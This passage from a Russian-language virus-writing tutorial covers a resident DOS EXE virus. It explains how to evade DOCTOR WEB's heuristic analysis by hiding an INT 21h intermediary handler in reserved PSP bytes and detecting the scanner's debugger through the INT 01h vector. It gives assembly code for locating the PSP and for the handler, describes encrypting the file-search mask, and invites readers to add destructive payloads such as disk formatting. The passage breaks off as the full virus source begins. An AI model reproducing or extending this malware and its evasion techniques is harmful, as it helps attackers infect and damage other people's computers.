Вирусы

        система заражена  неизвестным вирусом,и в каче-

        стве адреса,  по которому расположен его  код ,

        выдает адрес  обработчика INT 21h .

 

    Как видим, все не так уже и сложно.Далее пользова-

    тель должен решать  сам,действительно ли вирус при-

    сутствует в его компьютере. Отметим, что для реше-

    ния  этого вопроса   нужно  иметь довольно  высокую

    квалификацию, поэтому для  подавляющего большинства

    пользователей задача  представляется неразрешимой.

 

 

              2.3 Как реализовать защиту от

                 эвристического анализа

 

    Очевидно, вирус не будет  найден в памяти,если раз-

    местить обработчик INT 21h в той ее части, в кото-

    рую загружаются пользовательские  программы .С дру-

    гой стороны, наш вирус  помещает  свой код в  самые

    старшие адреса основной  памяти . Единственным  вы-

    ходом из положения  было бы написание обработчика  ,

    состоящего из двух  частей. При этом "первая" часть

    должна загружаться в  область памяти,выделенную для

    загрузки прикладных  программ,а "вторую" - вместе  с

    остальной частью вируса - следует записать в стар-

    шие адреса основной  памяти .В случае возникновения

    прерывания INT 21h управление  будет  передаваться

    первой части, которая  затем передаст его второй.

    К сожалению, данный  метод себя не оправдывает.DOC-

    TOR WEB  в процессе эвристического  анализа  просто

    трассирует обработчик INT 21h до входа в его исхо-

    дный ( системный )  код,  одновременно контролируя

    адрес обработчика, и  при получении любых  подозри-

    тельных результатов  выдает сообщение о наличии  не-

    известного вируса .Поэтому  необходимо сделать так,

    чтобы при трассировании  "первой" части под управ-

    лением отладчика вызывался  системный обработчик, а

    при "нормальном" трассировании  - вирусный ( экспе-

    рименты показывают,что  DOCTOR WEB,вероятнее всего,

    содержит встроенный  отладчик) .Для реализации ука-

    занного метода можно использовать особенность мик-

    ропроцессора, состоящую  в наличии очереди команд .

    Однако этот путь по  существу является  тупиковым,

    так как вирус, реализующий  такой алгоритм,не будет

    работать  на процессорах  PENTIUM из-за наличия  в

    последних так  называемой  системы  прогнозирования

    переходов. Мы же поступим  по другому.Как вы знаете

    все отладчики интенсивно  используют прерывание 01h

    ( One Step ),обработчик которого  останавливает ра-

    боту  микропроцессора  после выполнения каждой ко-

    манды. Поэтому  естественно   предположить, что для

    проведения эвристического  анализа DOCTOR WEB уста-

    навливает собственный  обработчик Int 01h,а значит,

    заменяет  адрес  системного  обработчика в  таблице

    векторов прерываний.На факт замены этого адреса мы

    и будем  ориентироваться.  Экспериментальным  путем

    было установлено, что  системный обработчик Int 01h

    находится  в памяти  по  такому адресу : 0070:XXXX.

    Следовательно, достаточно  проверить сегментный ад-

    рес обработчика Int 01h, чтобы сказать, перехваче-

    но-ли это прерывание  какой-нибудь прикладной про-

    граммой.

    Следующая проблема,возникающая  при построении про-

    граммы обработки прерывания  из двух частей, состо-

    ит вот в чем: непонятно, куда именно следует поме-

    стить " первую " часть,чтобы  она не затиралась при

    загрузке программ  и  их работе, и не была бы видна

    с помощью, например, VC.COM или RELEASE.

    Многочисленными экспериментами  было установлено ,

    что для размещения участка обработчика прерывания,

    ответственного за " обман  " эвристического  анали-

    затора, можно использовать  байты с 38h по 5Ch,при-

    надлежащие PSP первой загруженной  в память програ-

    ммы .Эти байты зарезервированы  разработчиками опе-

    рационной системы, вероятно,для  будущих ее версий,

    и их значения остаются  постоянными в течение всего

    сеанса работы компьютера .Кроме того, зарезервиро-

    ванного пространства  в PSP вполне хватит для  раз-

    мещения программы обработки прерывания .

    Итак, можно предложить  следующий алгоритм :

 

    1.) Отыскивается PSP  первой  загруженной в  память

        программы  .

 

    2.) В байты 38h - 5Ch записывается  код  " промежу-

        точного " обработчика прерывания INT 21h .Этот

        код  должен  вызывать  системный обработчик  при

        работе под  управлением отладчика и  вирусный  в

        противном  случае .

 

    *   На самом деле  можно использовать и другие  об-

        ласти PSP, расположенные  после байта со смеще-

        нием 5Ch ( примерно 32 байта - без всяких пос-

        ледствий. ).

 

    3.) В таблице  векторов  прерываний  вектор INT 21h

        заменяется  на точку входа в промежуточный   об-

        работчик .

 

    Вот, собственно, и все  .

 

 

           2.4 Реализуем предложенный алгоритм

 

    Как мы договорились,сначала  следует найти PSP пер-

    вой загруженной в  память программы .Это можно  сде-

    лать следующим образом  :

 

    find_psp:  push es                ;Найдем первый

               xor di,di              ;PSP в памяти

               xor ax,ax

 

    to_new_seg:inc ax

               mov es,ax

               cmp ax,0ffffh          ;Этот сегмент -

               jae free_mem           ;последний ?

       cmp byte ptr es:[di],4dh

                                      ;Это - MCB -

                                      ;блок ?

       jne to_new_seg         ;Нет !

    to_test:   mov bx,ax              ;Да !

               add bx,es:[di+3]

               inc bx

               mov es,bx

               cmp byte ptr es:[di],4dh

                                      ;Следующий MCB

                                      ;корректен ?

               je  restore_es         ;Да !

               cmp byte ptr es:[di],5ah

               jne to_new_seg         ;Нет !

    restore_es:mov es,ax

            cmp word ptr es:[di+1],0  ;MCB свободен ?

               je to_new_seg          ;Да !

               mov bx,es

               inc bx

               cmp es:[di+1],bx

               jne to_new_seg

       cmp byte ptr es:[di+10h],0cdh  ;После MCB сле-

                                      ;дует PSP ?

               jne to_new_seg         ;Нет  - тогда он

                                      ;нас не интере-

                                      ;сует ...

               mov first_psp,es       ;Да - найдена

               mov cx,es              ;нужная нам

               dec es_save            ;область памяти

               cmp es_save,cx         ;А  может, мы на-

                                      ;шли свой же

                                      ;PSP ?

               jne add_05h            ;Нет !

               pop es

               jmp fresh_input        ;Да !

    add_05h:   add first_psp,05h

 

    Напомним, что  PSP  располагается в  памяти  сразу

    вслед за MCB - блоком,выделенным операционной сис-

    темой для загрузки  программы, а первым байтом  PSP

    должно быть число  0CDh, что и используется в   при-

    веденном фрагменте .

    Дополнительно следует  рассмотреть следующую ситуа-

    цию : обычно первым  PSP в памяти является PSP ко-

    мандного процессора COMMAND.COM . Но при некоторых

    конфигурациях операционой  системы  (например,  при

    использовании WINDOWS 95 в  режиме эмуляции MS DOS)

    это правило иногда  не соблюдается .Может случиться

    так, что первой в  файле  AUTOEXEC.BAT для загрузки

    указана нерезидентная  EXE - программа,  зараженная

    нашим вирусом.При старте  этой программы вирус фак-

    тически отыщет ее  же PSP и запишет туда текст про-

    межуточного обработчика  INT 21h . Далее программа

    нерезидентно завершится, после чего занимаемая  ею

    память будет использована  другими программами, по-

    этому наш  промежуточный  обработчик будет затерт ,

    и компьютер обязательно  повиснет . Чтобы этого  не

    произошло, вирус проверяет,  какой именно PSP  был

    найден первым,  и   если имела место описанная  выше

    ситуация, отказывается  от заражения памяти .

    В остальном работа  фрагмента ясна .

 

 

           2.5 Пишем  промежуточный обработчик

 

    Теперь следует написать " промежуточный " обработ-

    чик прерывания INT 21h,который  должен вызывать си-

    стемный или вирусный  обработчики данного  прерыва-

    ния в зависимости  от режима работы процессора .Эту

    задачу можно решить, например, так :

 

    to_bios:   push ax                ;Текст  промежу-

                                      ;точного

               push ds                ;обработчика

                                      ;INT 21h ...

               pushf

               xor ax,ax

               mov ds,ax

    cmp word ptr ds:[0006h],0070h     ;Int 01h пере-

                                      ;хвачено ?

               jne cs:uuuuu           ;JMP на  систем-

                                      ;ный или вирус-

                                      ;ный обработчики

                                      ;INT 21h ...

               popf

               pop ds

               pop ax

               db 0eah                ;На вирусный ...

    our_21h_ip dw to_new_21h

    our_21h_cs dw 00h

    uuuuu:     popf

               pop ds

               pop ax

               db 0eah                ;На системный...

    sys_21h_ip dw 00h

    sys_21h_cs dw 00h

 

    code_len equ $ - to_bios          ;Длина обработ-

                                      ;чика

 

    Данный фрагмент написан   настолько просто, что ни-

    каких пояснений по  поводу его работы не требуется.

 

 

         2.6 Защита  от обнаружения вируса в файле

 

    Защитить вирус от  обнаружения в файле намного  про-

    ще, чем в памяти.Достаточно  только зашифровать ма-

    ску для поиска  EXE - программ ( *.exe ), и  вирус

    обнаружен не будет.Естественно,  перед поиском фай-

    ла - жертвы маска должна  быть расшифрована,а в за-

    раженном файле присутствовать  в зашифрованном  ви-

    де.

    Для решения этой задачи  был предложен такой  алго-

    ритм: маска расшифровывается вирусной  копией, на-

    ходящейся в памяти, непосредственно  перед  поиском

    EXE-файла,а при записи  вирусного кода в файл снова

    шифруется. Вряд-ли DOCTOR WEB станет устанавливать

    резидентный вирус   в память, а потом еще и  прове-

    рять, как он работает. А при простом просмотре или

    даже прохождении   зараженной программы  отладчиком

    можно увидеть только  закодированную маску.

 

 

              2.7 Несколько слов о вредных

              действиях вирусной программы

 

    Вирус, как правило,  для того и пишется,чтобы кому-

    то навредить или пошутить  над пользователями .Поэ-

    тому естественно было  бы включить в него какие-ни-

    будь действия,мешающие  нормальной работе  операто-

    ров компьютеров .Конечно,здесь существует огромная

    свобода : от  тривиальной  блокировки клавиатуры до

    " осыпания " букв с  экрана или форматирования вин-

    честера . Многие  вирусы  вообще содержат серьезные

    ошибки,  из - за  которых  зараженная система может

    перестать работать, поэтому что - нибудь более не-

    приятное придумать непросто .

    Поскольку книга носит  учебный харатер, мы не будем

    развивать  " вредительскую  " тему, а вместо  этого

    предоставим нашим читателям  возможность  творчески

    подойти к задаче.Можете не огорчаться - встроить в

    вирусную  программу   вредное  действие  на порядок

    проще,чем создать эту  программу.Учтите только, что

    изготовление вирусов  - дело очень неблагодарное, и

    без  должной конспирации  способно принести  самому

    " писателю " массу  неприятностей.Сами вирусы (осо-

    бенно чужие) - довольно  неприятная штука, хотя эта

    тема очень интересна.

 

 

        2.8 Полный текст  резидентного EXE - вируса

 

    Как  я уже говорил,  эта программа является  просто

   итогом  всех предыдущих и фактически составлена из

    их частей .Поэтому больше  объяснять, вероятно, не-

    чего .Последний штрих  - приведем полный текст раз-

    работанного нами резидентного EXE - вируса :

 

    ; _______________________________________________

    ;|                                               |

    ;| EXE TSR virus                                 |

    ;| Especially for my readers                     |

    ;|_______________________________________________|

 

    prg segment

        assume cs:prg,ds:prg,es:prg,ss:prg

               org 100h

 

    vir:       db 0ebh                ;9090h - Для

                                      ;резидентной

               db push_len            ;работы .

 

               pushf

               call cs:rest_code      ;Для надежности